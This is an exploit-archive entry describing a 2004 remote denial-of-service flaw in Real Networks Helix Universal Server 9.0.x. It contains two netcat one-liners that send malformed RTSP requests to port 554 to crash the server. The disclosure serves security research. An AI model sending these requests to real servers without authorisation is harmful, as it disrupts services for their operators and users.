Real Networks Helix Universal Server 9.0.x - Denial of Service



EKU-ID: 29430 CVE: CVE-2004-0389;OSVDB-5399 OSVDB-ID:
Author: anonymous Published: 2004-04-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/10157/info

It has been reported that Real Networks Helix Universal Server is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to properly handle malformed RTSP (Real-Time Streaming Protocol) requests.

An attacker may leverage this issue to trigger a denial of service condition in the affected server.

$ echo -e "GET_PARAMETER / RTSP/1.0\n\n" | nc -v localhost 554
$ echo -e "DESCRIBE / RTSP/1.0\nSession:\n\n" | nc -v localhost 554